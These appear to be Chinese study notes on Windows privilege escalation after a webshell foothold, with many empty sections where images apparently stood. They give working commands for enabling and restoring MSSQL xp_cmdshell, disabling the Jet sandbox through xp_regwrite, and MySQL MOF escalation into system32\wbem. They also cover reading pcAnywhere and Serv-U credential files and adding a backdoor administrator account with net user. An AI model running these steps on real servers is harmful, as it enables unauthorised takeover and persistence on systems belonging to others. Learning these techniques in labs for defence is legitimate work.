提权

1、启用匿名用户访问，  

IUSER  来宾  internet来宾  匿名访问   如果不勾选匿名访问 每次访问得时候 就需要输入用户名和密码

发布网站得时候 提示:必须是一个可更新得查询

修改属性  安全  ---->  权限  添加用户 everyone 

 

查看用户和组  dsa.msc

 

 IUSR_GUOHUIZHI  权限

 

 

2、80sec.asp   大马执行

一开始执行cmd命令 不成功 拒绝访问， 有可能是权限不够

要在system32/cmd  下设置一个erverone  完全控制

 

 

 

 

 

 

但是现在创建用户   不成功 因为权限不够 需要提权

 

 

3、

 

远程提权  RCE：利用kali进行远程代码执行 ，Metasploitable靶机

 

本地提权  LCE：

 

 

 

 

 

 

systeminfo>a.txt&(for %i in (KB952004 KB956572 KB970483 KB2160329 KB977165 KB2124261 KB2271195 KB2503665 KB2592799 KB2621440 KB2707511 KB2829361 KB2850851 KB2914368 KB3000061 KB3013455 KB3031432 KB3045171 KB3077657) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

检测哪些补丁没有安装 对应得exp就可以去利用了  

参见表格

 

 

 

 

MS11046

目录名

 

 

 

 

 

 

 

 

 

 

 

 

如果上传成功 就会创建一个账号 并且加入管理员组

 

 

 

pr.exe

C:\tools\lt\pr.exe

 

 

 用法就是  在  .exe后面加上命令

创建用户 并且加入管理员组

 

 

 net  user

 

 

 

 

 

 

4、数据库提权-MSSQL

▪Mssql提权，需要得到sa和密码。

▪四种主要提权途径

▪（1）、xp_cmdshell

▪（2）、sp_oacreate和sp_oamethod提权

▪（3）、沙盒提权

▪（4)、JOB

 

 

mssql提权工具一、

sqltool  直接连接  需要知道sa密码， 

怎么拿sa账号得密码?  通过webshell  去下载文件 查看代码，拿到connect密码

 

 

 

mssql提权工具二、Webshell直接运行（集成命令或者执行SQL语句）或者  一句话木马 菜刀连接 数据库管理

 

 

 

 

mssql  提权途径一：  xp_cmdshell

 exec  xp_cmdshell  “命令”；

 

exec  xp_cmdshell    ' net user   aaa   aaa  /add && net localgroup administrators aaa  /add'

 

 

测试是否启用了xp_cmdshell.SQL 2000默认开启，SQL2005默认禁用

如果xp_cmdshell是禁用状态，则可以开启xp_cmdshell，启用即可执行。

▪;EXEC sp_configure'show advanced options', 1 　　--启用高级配置选项

▪;Reconfigure　　 --更新配置

▪;EXEC sp_configure'xp_cmdshell', 1 　　--开启xp_cmdshell，如果关闭，需要将这里的1改为“0”

▪;RECONFIGURE 　　--更新配置

如果xp_cmdshell存储过程被删除了，那么必须通过xplog70.dll恢复。

▪;exec sp_addextendedproc'xp_cmdshell', 'xplog70.dll'

如果xplog70.dll也被删除了，那么就必须将xplog70.dll上传到系统，然后才能恢复xp_cmdshell.
▪;exec sp_addextendedproc'xp_cmdshell','C:\xplog70.dll'

 

再次执行 exec  xp_cmdshell    ' net user   aaa   aaa  /add && net localgroup administrators aaa  /add' 

 

 

 

 

 mssql  提权途径二：  sp_oacreate和sp_oamethod提权

换言之就是xp_cmdshell能执行的sp_oacreate＋sp_oamethod同样能胜任。

开启sp-ascreate。默认2005中是禁用的。2000中默认开启

 mssql  提权途径三：  沙盒提权

用xp_regwrite这个存储过程对注册表进行写操作，关掉沙盒模式。

SQL语句为：

▪EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

▪--执行成功沙盒模式就被关闭了。

 

 

 

SQL2005默认是禁用Ad Hoc Distributed，执行命令时，会提示错误。需要开启

 

mssql  提权途径四：  JOB提权

 

 

 

 

mssql  提权途径五：映像劫持

 

 

 

 

 

 

 5、MySQL提权   UDF+MOF

 

法一、  UDF（ user defined function 用户定义函数）

提权过程：

导出路径 注意一下：

 

 

 

 

 

 

法二、  MOF提权

 

原理：　　

 

 

 代码：　　　　

 

 

 

 

 

 

 

 

 

 

 

 利用root权限执行SQL语句：

select load_file ('C:/phpStudy/PHPTutorial/WWW/test创建帐号.mof') into dumpfile 'c:/windows/system32/wbem/mof/good/nullevt.mof'

-实际执行时，创建账户与加入管理员组分开执行。

 

 首先要知道 他的原始位置！

 

 

 

 

再次上传test添加管理员组.mof  ，并执行sql语句

 

select load_file ('C:/phpStudy/PHPTutorial/WWW/test添加管理员组.mof') into dumpfile 'c:/windows/system32/wbem/mof/good/nullevt1.mof'

 

等一段时间 就可以看到用户创建成功

 

遇到的问题

 

 

 

 

 

 

secure_file_priv="/"

 show variables like '%secure%';查看 secure-file-priv 当前的值，如果显示为NULL，则需要打开
C:\phpstudy\PHPTutorial\MySQL\my.ini文件，在其中加上一句：secure_file_priv=“/”。

 

等一小会 就可以看到创建的用户

 

 

 

 

 

 

 

遇到一个问题：

mysql出现unblock with 'mysqladmin flush-hosts'

解决方案：  重启数据库，设置最大错误值

 

show global variables like  ‘port’；  查看端口

 

 

 

 

 

6第三方应用提权

phpadmin

 

尝试256次 就可以登录成功  一个漏洞

 

 

 

 

 

pcanywhere

▪利用普通Webshell读取cif文件之后，很方便的可以拿到服务器的管理员权限

▪类似的，Serv-U会把管理账号的信息储存在ServUDaemon.ini中，

FlashFXP会把FTP站点信息保存在Sites.dat文件中...

 

 

Radmin

 

 

 

 

Serv-U 虚拟机主机提权大马  有一个集成模块 serv u 提权。

有一个默认得用户名和密码

就可以执行命令

cmd /c net user 80sec 80sec /add & net localgroup administrators 80sec /add

 

 

 

 

serve u提权

之后因为对目录有可执行权限，所以执行提权命令：